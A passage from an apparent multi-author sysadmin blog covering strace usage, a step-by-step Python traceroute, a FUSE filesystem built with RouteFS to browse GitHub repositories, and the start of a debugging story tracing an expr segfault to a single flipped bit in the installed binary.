poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
[...]

Those write() syscalls are the SQL queries -- we can make out the SELECT foo FROM bar, and then it trails off. To see the rest, note the file descriptor the syscalls are happening on -- the first argument of read() or write(), which is 3 here. Pass that file descriptor to -e write=:

$ strace -p 9026 -e write=3
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
 | 00000  30 00 00 00 03 53 45 4c  45 43 54 20 74 69 6d 65  0....SEL ECT time |
 | 00010  73 74 61 6d 70 20 46 52  4f 4d 20 61 72 74 69 66  stamp FR OM artif |
 | 00020  61 63 74 73 20 57 48 45  52 45 20 69 64 20 3d 20  acts WHE RE id =  |
 | 00030  31 34 35 34                                       1454              |

and we see the whole query. It's both printed and in hex, in case it's binary. We could also get the whole thing with an option like -s 1024, but then we'd see all the data coming back via read() -- the use of -e write= lets us pick and choose.

Filtering the Output
Sometimes the full syscall trace is too much -- you just want to see what files the program touches, or when it reads and writes data, or some other subset. For this the -e trace= option was made. You can select a named suite of system calls like -e trace=file (for syscalls that mention filenames) or -e trace=desc (for read() and write() and friends, which mention file descriptors), or name individual system calls by hand. We'll use this option in the next example.

Child Processes
Sometimes the process you trace doesn't do the real work itself, but delegates it to child processes that it creates. Shell scripts and Make runs are notorious for taking this behavior to the extreme. If that's the case, you may want to pass -f to make strace "follow forks" and trace child processes, too, as soon as they're made.

For example, here's a trace of a simple shell script, without -f:

$ strace -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
[...]
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f4b68af5770) = 11948
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 11948
--- SIGCHLD (Child exited) @ 0 (0) --
wait4(-1, 0x7fffc3473604, WNOHANG, NULL) = -1 ECHILD (No child processes)

Not much to see here -- all the real work was done inside process 11948, the one created by that clone() syscall.

Here's the same script traced with -f (and the trace edited for brevity):

$ strace -f -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
[...]
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(Process 10738 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f5a93f99770) = 10738
[pid 10682] wait4(-1, Process 10682 suspended

[pid 10738] open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3
[pid 10738] dup2(3, 1)                  = 1
[pid 10738] close(3)                    = 0
[pid 10738] execve("/bin/ls", ["ls", ".git/objects/28"], [/* 25 vars */]) = 0
[... setup of C standard library omitted ...]
[pid 10738] stat(".git/objects/28", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
[pid 10738] open(".git/objects/28", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 3
[pid 10738] getdents(3, /* 40 entries */, 4096) = 2480
[pid 10738] getdents(3, /* 0 entries */, 4096) = 0
[pid 10738] close(3)                    = 0
[pid 10738] write(1, "04102fadac20da3550d381f444ccb5676"..., 1482) = 1482
[pid 10738] close(1)                    = 0
[pid 10738] close(2)                    = 0
[pid 10738] exit_group(0)               = ?
Process 10682 resumed
Process 10738 detached
<... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 10738
--- SIGCHLD (Child exited) @ 0 (0) ---

Now this trace could be a miniature education in Unix in itself -- future blog post? The key thing is that you can see ls do its work, with that open() call followed by getdents().

The output gets cluttered quickly when multiple processes are traced at once, so sometimes you want -ff, which makes strace write each process's trace into a separate file.

Use #2: Why/Where Is A Program Stuck?
Sometimes a program doesn't seem to be doing anything. Most often, that means it's blocked in some system call. Strace to the rescue.

$ strace -p 22067
Process 22067 attached - interrupt to quit
flock(3, LOCK_EX

Here it's blocked trying to take out a lock, an exclusive lock (LOCK_EX) on the file it's opened as file descriptor 3. What file is that?

$ readlink /proc/22067/fd/3
/tmp/foobar.lock

Aha, it's the file /tmp/foobar.lock. And what process is holding that lock?

$ lsof | grep /tmp/foobar.lock
 command   21856       price    3uW     REG 253,88       0 34443743 /tmp/foobar.lock
 command   22067       price    3u      REG 253,88       0 34443743 /tmp/foobar.lock

Process 21856 is holding the lock. Now we can go figure out why 21856 has been holding the lock for so long, whether 21856 and 22067 really need to grab the same lock, etc.

Other common ways the program might be stuck, and how you can learn more after discovering them with strace:

  • Waiting on the network. Use lsof again to see the remote hostname and port.
  • Trying to read a directory. Don't laugh -- this can actually happen when you have a giant directory with many thousands of entries. And if the directory used to be giant and is now small again, on a traditional filesystem like ext3 it becomes a long list of "nothing to see here" entries, so a single syscall may spend minutes scanning the deleted entries before returning the list of survivors.
  • Not making syscalls at all. This means it's doing some pure computation, perhaps a bunch of math. You're outside of strace's domain; good luck.

Uses #3, #4, ...
A post of this length can only scratch the surface of what strace can do in a sysadmin's toolbox. Some of my other favorites include

  • As a progress bar. When a program's in the middle of a long task and you want to estimate if it'll be another three hours or three days, strace can tell you what it's doing right now -- and a little cleverness can often tell you how far that places it in the overall task.
  • Measuring latency. There's no better way to tell how long your application takes to talk to that remote server than watching it actually read() from the server, with strace -T as your stopwatch.
  • Identifying hot spots. Profilers are great, but they don't always reflect the structure of your program. And have you ever tried to profile a shell script? Sometimes the best data comes from sending a strace -tt run to a file, and picking through to see when each phase of your program started and finished.
  • As a teaching and learning tool. The user/kernel boundary is where almost everything interesting happens in your system. So if you want to know more about how your system really works -- how about curling up with a set of man pages and some output from strace?

~price

Wednesday Jul 28, 2010

Learning by doing: Writing your own traceroute in 8 easy steps

Anyone who administers even a moderately sized network knows that when problems arise, diagnosing and fixing them can be extremely difficult. They're usually non-deterministic and difficult to reproduce, and very similar symptoms (e.g. a slow or unreliable connection) can be caused by any number of problems — congestion, a broken router, a bad physical link, etc.

One very useful weapon in a system administrator's arsenal for dealing with network issues is traceroute (or tracert, if you use Windows). This is a neat little program that will print out the path that packets take to get from the local machine to a destination — that is, the sequence of routers that the packets go through.

Using traceroute is pretty straightforward. On a UNIX-like system, you can do something like the following:

    $ traceroute google.com
    traceroute to google.com (173.194.33.104), 30 hops max, 60 byte packets
     1  router.lan (192.168.1.1)  0.595 ms  1.276 ms  1.519 ms
     2  70.162.48.1 (70.162.48.1)  13.669 ms  17.583 ms  18.242 ms
     3  ge-2-20-ur01.cambridge.ma.boston.comcast.net (68.87.36.225)  18.710 ms  19.192 ms  19.640 ms
     4  be-51-ar01.needham.ma.boston.comcast.net (68.85.162.157)  20.642 ms  21.160 ms  21.571 ms
     5  pos-2-4-0-0-cr01.newyork.ny.ibone.comcast.net (68.86.90.61)  28.870 ms  29.788 ms  30.437 ms
     6  pos-0-3-0-0-pe01.111eighthave.ny.ibone.comcast.net (68.86.86.190)  30.911 ms  17.377 ms  15.442 ms
     7  as15169-3.111eighthave.ny.ibone.comcast.net (75.149.230.194)  40.081 ms  41.018 ms  39.229 ms
     8  72.14.238.232 (72.14.238.232)  20.139 ms  21.629 ms  20.965 ms
     9  216.239.48.24 (216.239.48.24)  25.771 ms  26.196 ms  26.633 ms
    10 173.194.33.104 (173.194.33.104)  23.856 ms  24.820 ms  27.722 ms

Pretty nifty. But how does it work? After all, when a packet leaves your network, you can't monitor it anymore. So when it hits all those routers, the only way you can know about that is if one of them tells you about it.

The secret behind traceroute is a field called "Time To Live" (TTL) that is contained in the headers of the packets sent via the Internet Protocol. When a host receives a packet, it checks if the packet's TTL is greater than 1 before sending it on down the chain. If it is, it decrements the field. Otherwise, it drops the packet and sends an ICMP TIME_EXCEEDED packet to the sender. This packet, like all IP packets, contains the address of its sender, i.e. the intermediate host.

traceroute works by sending consecutive requests to the same destination with increasing TTL fields. Most of these attempts result in messages from intermediate hosts saying that the packet was dropped. The IP addresses of these intermediate hosts are then printed on the screen (generally with an attempt made at determining the hostname) as they arrive, terminating when the maximum number of hosts have been hit (on my machine's traceroute the default maximum is 30, but this is configurable), or when the intended destination has been reached.

The rest of this post will walk through implementing a very primitive version of traceroute in Python. The real traceroute is of course more complicated than what we will create, with many configurable features and modes. Still, our version will implement the basic functionality, and at the end, we'll have a really nice and short Python script that will do just fine for performing a simple traceroute.

So let's begin. Our algorithm, at a high level, is an infinite loop whose body creates a connection, prints out information about it, and then breaks out of the loop if a certain condition has been reached. So we can start with the following skeletal code:

    def main(dest):
        while True:
            # ... open connections ...
            # ... print data ...
            # ... break if useful ...
            pass

    if __name__ == "__main__":
        main('google.com')

Step 1: Turn a hostname into an IP address.

The socket module provides a gethostbyname() method that attempts to resolve a domain name into an IP address:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        while True:
            # ... open connections ...
            # ... print data ...
            # ... break if useful ...
            pass

    if __name__ == "__main__":
        main('google.com')
Step 2: Create sockets for the connections.

We'll need two sockets for our connections — one for receiving data and one for sending. We have a lot of choices for what kind of probes to send; let's use UDP probes, which require a datagram socket (SOCK_DGRAM). The routers along our traceroute path are going to send back ICMP packets, so for those we need a raw socket (SOCK_RAW).

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')

Step 3: Set the TTL field on the packets.

We'll simply use a counter which begins at 1 and which we increment with each iteration of the loop. We set the TTL using the setsockopt module of the socket object:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)

            ttl += 1
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')

Step 4: Bind the sockets and send some packets.

Now that our sockets are all set up, we can put them to work! We first tell the receiving socket to listen to connections from all hosts on a specific port (most implementations of traceroute use ports from 33434 to 33534 so we will use 33434 as a default). We do this using the bind() method of the receiving socket object, by specifying the port and an empty string for the hostname. We can then use the sendto() method of the sending socket object to send to the destination host (on the same port). The first argument of the sendto() method is the data to send; in our case, we don't actually have anything specific we want to send, so we can just give the empty string:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))

            ttl += 1
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')
Step 5: Get the intermediate hosts' IP addresses.

Next, we need to actually get our data from the receiving socket. For this, we can use the recvfrom() method of the object, whose return value is a tuple containing the packet data and the sender's address. In our case, we only care about the latter. Note that the address is itself actually a tuple containing both the IP address and the port, but we only care about the former. recvfrom() takes a single argument, the blocksize to read — let's go with 512.

It's worth noting that some administrators disable receiving ICMP ECHO requests, pretty much specifically to prevent the use of utilities like traceroute, since the detailed layout of a network can be sensitive information (another common reason to disable them is the ping utility, which can be used for denial-of-service attacks). It is therefore completely possible that we'll get a timeout error, which will result in an exception. Thus, we'll wrap this call in a try/except block. Traditionally, traceroute prints asterisks when it can't get the address of a host. We'll do the same once we print out results.

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))
            curr_addr = None
            try:
                _, curr_addr = recv_socket.recvfrom(512)
                curr_addr = curr_addr[0]
            except socket.error:
                pass
            finally:
                send_socket.close()
                recv_socket.close()

            ttl += 1
            # ... print data ...
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')
Step 6: Turn the IP addresses into hostnames and print the data.

To match traceroute's behavior, we want to try to display the hostname along with the IP address. The socket module provides the gethostbyaddr() method for reverse DNS resolution. The resolution can fail and result in an exception, in which case we'll want to catch it and make the hostname the same as the address. Once we get the hostname, we have all the information we need to print our data:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))
            curr_addr = None
            curr_name = None
            try:
                _, curr_addr = recv_socket.recvfrom(512)
                curr_addr = curr_addr[0]
                try:
                    curr_name = socket.gethostbyaddr(curr_addr)[0]
                except socket.error:
                    curr_name = curr_addr
            except socket.error:
                pass
            finally:
                send_socket.close()
                recv_socket.close()

            if curr_addr is not None:
                curr_host = "%s (%s)" % (curr_name, curr_addr)
            else:
                curr_host = "*"
            print "%d\t%s" % (ttl, curr_host)

            ttl += 1
            # ... break if useful ...

    if __name__ == "__main__":
        main('google.com')

Step 7: End the loop.

There are two conditions for exiting our loop — either we have reached our destination (that is, curr_addr is equal to dest_addr)1 or we have exceeded some maximum number of hops. We will set our maximum at 30:

    #!/usr/bin/python

    import socket

    def main(dest_name):
        dest_addr = socket.gethostbyname(dest_name)
        port = 33434
        max_hops = 30
        icmp = socket.getprotobyname('icmp')
        udp = socket.getprotobyname('udp')
        ttl = 1
        while True:
            recv_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW, icmp)
            send_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, udp)
            send_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
            recv_socket.bind(("", port))
            send_socket.sendto("", (dest_name, port))
            curr_addr = None
            curr_name = None
            try:
                _, curr_addr = recv_socket.recvfrom(512)
                curr_addr = curr_addr[0]
                try:
                    curr_name = socket.gethostbyaddr(curr_addr)[0]
                except socket.error:
                    curr_name = curr_addr
            except socket.error:
                pass
            finally:
                send_socket.close()
                recv_socket.close()

            if curr_addr is not None:
                curr_host = "%s (%s)" % (curr_name, curr_addr)
            else:
                curr_host = "*"
            print "%d\t%s" % (ttl, curr_host)

            ttl += 1
            if curr_addr == dest_addr or ttl &gt; max_hops:
                break

    if __name__ == "__main__":
        main('google.com')

Step 8: Run the code!

We're done! Let's save this to a file and run it! Because raw sockets require root privileges, traceroute is typically setuid. For our purposes, we can just run the script as root:

    $ sudo python poor-mans-traceroute.py
    [sudo] password for leonidg:
    1       router.lan (192.168.1.1)
    2       70.162.48.1 (70.162.48.1)
    3       ge-2-20-ur01.cambridge.ma.boston.comcast.net (68.87.36.225)
    4       be-51-ar01.needham.ma.boston.comcast.net (68.85.162.157)
    5       pos-2-4-0-0-cr01.newyork.ny.ibone.comcast.net (68.86.90.61)
    6       pos-0-3-0-0-pe01.111eighthave.ny.ibone.comcast.net (68.86.86.190)
    7       as15169-3.111eighthave.ny.ibone.comcast.net (75.149.230.194)
    8       72.14.238.232 (72.14.238.232)
    9       216.239.48.24 (216.239.48.24)
    10     173.194.33.104 (173.194.33.104)

Hurrah! The data matches the real traceroute's perfectly.

Of course, there are many improvements that we could make. As I mentioned, the real traceroute has a whole slew of other features, which you can learn about by reading the manpage. In the meantime, I wrote a slightly more complete version of the above code that allows configuring the port and max number of hops, as well as specifying the destination host. You can download it at my github repository.

Alright folks, What UNIX utility should we write next? strace, anyone? :-) 2

1 This is actually not quite how the real traceroute works. Rather than checking the IP addresses of the hosts and stopping when the destination address matches, it stops when it receives a ICMP "port unreachable" message, which means that the host has been reached. For our purposes, though, this simple address heuristic is good enough.

2 Ksplice blogger Nelson took up a DIY strace on his personal blog, Made of Bugs.

~leonidg

Wednesday Jul 07, 2010

Building Filesystems the Way You Build Web Apps

FUSE is awesome. While most major Linux filesystems (ext3, XFS, ReiserFS, btrfs) are built-in to the Linux kernel, FUSE is a library that lets you instead write filesystems as userspace applications. When something attempts to access the filesystem, those accesses get passed on to the FUSE application, which can then return the filesystem data.

It lets you quickly prototype and test filesystems that can run on multiple platforms without writing kernel code. You can easily experiment with strange and unusual interactions between the filesystem and your applications. You can even build filesystems without writing a line of C code.

FUSE has a reputation of being used only for toy filesystems (when are you actually going to use flickrfs?), but that's really not fair. FUSE is currently the best way to read NTFS partitions on Linux, how non-GNOME and legacy applications can access files over SFTP, SMB, and other protocols, and the only way to run ZFS on Linux.

But because the FUSE API calls separate functions for each system call (i.e. getattr, open, read, etc.), in order to write a useful filesystem you need boilerplate code to translate requests for a particular path into a logical object in your filesystem, and you need to do this in every FUSE API function you implement.

Take a page from web apps

This is the kind of problem that web development frameworks have also had to solve, since it's been a long time since a URL always mapped directly onto a file on the web server. And while there are a handful of approaches for handling URL dispatch, I've always been a fan of the URL dispatch style popularized by routing in Ruby on Rails, which was later ported to Python as the Routes library.

Routes dissociates an application's URL structure from your application's internal organization, so that you can connect arbitrary URLs to arbitrary controllers. However, a more common use of Routes involves embedding variables in the Routes configuration, so that you can support a complex and potentially arbitrary set of URLs with a comparatively simple configuration block. For instance, here is the (slightly simplified) Routes configuration from a Pylons web application:

from routes import Mapper

def make_map():
    map = Mapper()
    map.minimization = False
    
    # The ErrorController route (handles 404/500 error pages); it should
    # likely stay at the top, ensuring it can always be resolved
    map.connect('error/{action}/{id}', controller='error')
    map.connect('/', controller='status', action='index')
    map.connect('/{controller}', action='index')
    map.connect('/{controller}/{action}')
    map.connect('/{controller}/{action}/{id}')

    return map

In this example, {controller}, {action}, and {id} are variables which can match any string within that component. So, for instance, if someone were to access /spend/new within the web application, Routes would find a controller named spend, and would call the new action on that method.

RouteFS: URL routing for filesystems

Just as URLs take their inspiration from the filesystem, we can use the ideas from URL routing in our filesystem. And to make this easy, I created a project called RouteFS. RouteFS ties together FUSE and Routes, and it's great because it lets you specify your filesystem in terms of the filesystem hierarchy instead of in terms of the system calls to access it.

RouteFS was originally developed as a generalized solution to a real problem I faced while working on the Invirt project at MIT. We wanted a series of filesystem entries that were automatically updated when our database changed (specifically, we were using .k5login files to control access to a server), so we used RouteFS to build a filesystem where every filesystem lookup was resolved by a database query, ensuring that our filesystem always stayed up to date.

Today, however, we're going to be using RouteFS to build the very thing I lampooned FUSE for: toy filesystems. I'll be demonstrating how to build a simple filesystem in less than 60 lines of code. I want to continue the popular theme of exposing Web 2.0 services as filesystems, but I'm also a software engineer at a very Git- and Linux-heavy company. The popular Git repository hosting site Github has an API for interacting with the repositories hosted there, so we'll use the Python bindings for the API to build a Github filesystem, or GithubFS. GithubFS lets you examine the Git repositories on Github, as well as the different branches of those repositories.

Getting started

If you want to follow along, you'll first need to install FUSE itself, along with the Python FUSE bindings - look for a python-fuse or fuse-python package. You'll also need a few third-party Python packages: Routes, RouteFS, and github2. Routes and RouteFS are available from the Python Cheeseshop, so you can install those by running easy_install Routes RouteFS. For github2, you'll need the bleeding edge version, which you can get by running easy_install http://github.com/ask/python-github2/tarball/master

Now then, let's start off with the basic shell of a RouteFS filesystem:

#!/usr/bin/python

import routes
import routefs

class GithubFS(routefs.RouteFS):
    def make_map(self):
        m = routes.Mapper()
        return m

if __name__ == '__main__':
    routefs.main(GithubFS)

As with the web application code above, the make_map method of the GithubFS class creates, configures, and returns a Python Routes mapper, which RouteFS uses for dispatching accesses to the filesystem. The routefs.main function takes a RouteFS class and handles instantiating the class and mounting the filesystem.

Populating the filesystem

Now that we have a filesystem, let's put some files in it:

#!/usr/bin/python

import routes
import routefs

class GithubFS(routefs.RouteFS):
    def __init__(self, *args, **kwargs):
        super(GithubFS, self).__init__(*args, **kwargs)

        # Maps user -&gt; [projects]
        self.user_cache = {}

    def make_map(self):
        m = routes.Mapper()
        m.connect('/', controller='list_users')
        return m

    def list_users(self, **kwargs):
        return [user
            for user, projects in self.user_cache.iteritems()
            if projects]

if __name__ == '__main__':
    routefs.main(GithubFS)

Here, we add our first Routes mapping, connecting '/', or the root of the filesystem, to the list_users controller, which is just a method on the filesystem's class. The list_users controller returns a list of strings. When the controller that a path maps to returns a list, RouteFS automatically makes that path into a directory. To make a path be a file, you just return a single string containing the file's contents.

We'll use the user_cache attribute to keep track of the users that we've seen and their repositories. This will let us auto-populate the root of the filesystem as users get looked up.

Let's add some code to populate that cache:

#!/usr/bin/python

from github2 import client
import routes
import routefs

class GithubFS(routefs.RouteFS):
    def __init__(self, *args, **kwargs):
        super(GithubFS, self).__init__(*args, **kwargs)

        # Maps user -&gt; [projects]
        self.user_cache = {}
        self.github = client.Github()

    def make_map(self):
        m = routes.Mapper()
        m.connect('/', controller='list_users')
        m.connect('/{user}', controller='list_repos')
        return m

    def list_users(self, **kwargs):
        return [user
            for user, projects in self.user_cache.iteritems()
            if projects]

    def list_repos(self, user, **kwargs):
        if user not in self.user_cache:
            try:
                self.user_cache[user] = [r.name
                    for r in self.github.repos.list(user)]
            except:
                self.user_cache[user] = None

        return self.user_cache[user]

if __name__ == '__main__':
    routefs.main(GithubFS)

That's enough code that we can start interacting with the filesystem:

opus:~ broder$ ./githubfs /mnt/githubfs
opus:~ broder$ ls /mnt/githubfs
opus:~ broder$ ls /mnt/githubfs/ebroder
anygit	    githubfs	 pyhesiodfs	 python-simplestar
auto-aklog  ibtsocs	 python-github2  python-zephyr
bluechips   libhesiod	 python-hesiod
debmarshal  ponyexpress  python-moira
debothena   pyafs	 python-routefs
opus:~ broder$ ls /mnt/githubfs
ebroder

Users and projects and branches, oh my!

You can see a slightly more fleshed-out filesystem on (where else?) Github. GithubFS lets you look at the current SHA-1 for each branch in each repository for a user:

opus:~ broder$ ./githubfs /mnt/githubfs
opus:~ broder$ ls /mnt/githubfs/ebroder
anygit	    githubfs	 pyhesiodfs	 python-simplestar
auto-aklog  ibtsocs	 python-github2  python-zephyr
bluechips   libhesiod	 python-hesiod
debmarshal  ponyexpress  python-moira
debothena   pyafs	 python-routefs
opus:~ broder$ ls /mnt/githubfs/ebroder/githubfs
master
opus:~ broder$ cat /mnt/githubfs/ebroder/githubfs/master
cb4fc93ba381842fa0c2b34363d52475c4109852

What next?

Want to see more examples of RouteFS? RouteFS itself includes some example filesystems, and you can see how we used RouteFS within the Invirt project. But most importantly, because RouteFS is open source, you can incorporate it into your own projects.

So, what cool tricks can you think of for dynamically generated filesystems?

~broder

Thursday Jun 24, 2010

Attack of the Cosmic Rays!

It's a well-documented fact that RAM in modern computers is susceptible to occasional random bit flips due to various sources of noise, most commonly high-energy cosmic rays. By some estimates, you can even expect error rates as high as one error per 4GB of RAM per day! Many servers these days have ECC RAM, which uses extra bits to store error-correcting codes that let them correct most bit errors, but ECC RAM is still fairly rare in desktops, and unheard-of in laptops.

For me, bitflips due to cosmic rays are one of those problems I always assumed happen to "other people". I also assumed that even if I saw random cosmic-ray bitflips, my computer would probably just crash, and I'd never really be able to tell the difference from some random kernel bug.

A few weeks ago, though, I encountered some bizarre behavior on my desktop, that honestly just didn't make sense. I spent about half an hour digging to discover what had gone wrong, and eventually determined, conclusively, that my problem was a single undetected flipped bit in RAM. I can't prove whether the problem was due to cosmic rays, bad RAM, or something else, but in any case, I hope you find this story interesting and informative.

The problem

The symptom that I observed was that the expr program, used by shell scripts to do basic arithmetic, had started consistently segfaulting. This first manifested when trying to build a software project, since the GNU autotools make heavy use of this program:

[nelhage@psychotique]$ autoreconf -fvi
autoreconf: Entering directory `.'
autoreconf: configure.ac: not using Gettext
autoreconf: running: aclocal --force -I m4
autoreconf: configure.ac: tracing
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
…

dmesg revealed that the segfaulting program was expr:

psychotique kernel: [105127.372705] expr[7756]: segfault at 1a70 ip 0000000000001a70 sp 00007fff2ee0cc40 error 4 in expr

And I was easily able to reproduce the problem by hand:

[nelhage@psychotique]$ expr 3 + 3
Segmentation fault

expr definitely hadn't been segfaulting as of a day ago or so, so something had clearly gone suddenly, and strangely, wrong. I had no idea what, but I decided to find out.

Check the dumb things

I run Ubuntu, so the first things I checked were the /var/log/dpkg.log and /var/log/aptitude.log files, to determine whether any suspicious packages had been upgraded recently. Perhaps Ubuntu accidentally let a buggy package slip into the release. I didn't recall doing any significant upgrades, but maybe dependencies had pulled in an upgrade I had missed.

The logs revealed I hadn't upgraded anything of note in the last several days, so that theory was out.

Next up, I checked env | grep ^LD. The dynamic linker takes input from a number of environment variables, all of whose names start with LD_. Was it possible I had somehow ended up setting some variable that was messing up the dynamic linker, causing it to link a broken library or something?

[nelhage@psychotique]$ env | grep ^LD
[nelhage@psychotique]$ 

That, too, turned up nothing.

Start digging

I was fortunate in that, although this failure is strange and sudden, it seemed perfectly reproducible, which means I had the luxury of being able to run as many tests as I wanted to debug it.

The problem is a segfault, so I decided to pull up a debugger and figure out where it's segfaulting. First, though, I'd want debug symbols, so I could make heads or tails of the crashed program. Fortunately, Ubuntu provides debug symbols for every package they ship, in a separate repository. I already had the debug sources enabled, so I used dpkg -S to determine that expr belongs to the coreutils package:

[nelhage@psychotique]$ dpkg -S $(which expr)
coreutils: /usr/bin/expr

And installed the coreutils debug symbols:

[nelhage@psychotique]$ sudo aptitude install coreutils-dbgsym

Now, I could run expr inside gdb, catch the segfault, and get a stack trace:

[nelhage@psychotique]$ gdb --args expr 3 + 3
…
(gdb) run
Starting program: /usr/bin/expr 3 + 3
Program received signal SIGSEGV, Segmentation fault.
0x0000000000001a70 in ?? ()
(gdb) bt
#0  0x0000000000001a70 in ?? ()
#1  0x0000000000402782 in eval5 (evaluate=true) at expr.c:745
#2  0x00000000004027dd in eval4 (evaluate=true) at expr.c:773
#3  0x000000000040291d in eval3 (evaluate=true) at expr.c:812
#4  0x000000000040208d in eval2 (evaluate=true) at expr.c:842
#5  0x0000000000402280 in eval1 (evaluate=<value optimized out>) at expr.c:921
#6  0x0000000000402320 in eval (evaluate=<value optimized out>) at expr.c:952
#7  0x0000000000402da5 in main (argc=2, argv=0x0) at expr.c:329

So, for some reason, the eval5 function has jumped off into an invalid memory address, which of course causes a segfault. Repeating the test a few time confirmed that the crash was totally deterministic, with the same stack trace each time. But what is eval5 trying to do that's causing it to jump off into nowhere? Let's grab the source and find out:

[nelhage@psychotique]$ apt-get source coreutils
[nelhage@psychotique]$ cd coreutils-7.4/src/
[nelhage@psychotique]$ gdb --args expr 3 + 3
# Run gdb, wait for the segfault
(gdb) up
#1  0x0000000000402782 in eval5 (evaluate=true) at expr.c:745
745           if (nextarg (":"))
(gdb) l
740       trace ("eval5");
741     #endif
742       l = eval6 (evaluate);
743       while (1)
744         {
745           if (nextarg (":"))
746             {
747               r = eval6 (evaluate);
748               if (evaluate)
749                 {

I used the apt-get source command to download the source package from Ubuntu, and ran gdb in the source directory, so it could find the files referred to by the debug symbols. I then used the up command in gdb to go up a stack frame, to the frame where eval5 called off into nowhere.

From the source, we see that eval5 is trying to call the nextarg function. `gdb` will happily tell us where that function is supposed to be located:

(gdb) p nextarg
$1 = {_Bool (const char *)} 0x401a70 <nextarg>

Comparing that address with the address in the stack trace above, we see that they differ by a single bit. So it appears that somewhere a single bit has been flipped, causing that call to go off into nowhere.

But why?

So there's a flipped bit. But why, and how did it happen? First off, let's determine where the problem is. Is it in the expr binary itself, or is something more subtle going on?

[nelhage@psychotique]$ debsums coreutils | grep FAILED
/usr/bin/expr                                                             FAILED

The debsums program will compare checksums of files on disk with a manifest contained in the Debian package they came from. In this case, examining the coreutils package, we see that the expr binary has in fact been modified since it was installed. We can verify how it's different by downloading a new version of the package, and comparing the files:

[nelhage@psychotique]$ aptitude download coreutils
[nelhage@psychotique]$ mkdir coreutils
[nelhage@psychotique]$ dpkg -x coreutils_7.4-2ubuntu1_amd64.deb coreutils
[nelhage@psychotique]$ cmp -bl coreutils/usr/bin/expr /usr/bin/expr
 10113 377 M-^? 277 M-?

aptitude download downloads a .deb package, instead of actually doing the installation. I used dpkg -x to just extract the contents of the file, and cmp to compare the packaged expr with the installed one. -b tells cmp to list any bytes that differ, and -l tells it to list all differences, not just the first one. So we can see that two bytes differ, and by a single bit, which agrees with the failure we saw. So somehow the installed expr binary is corrupted.

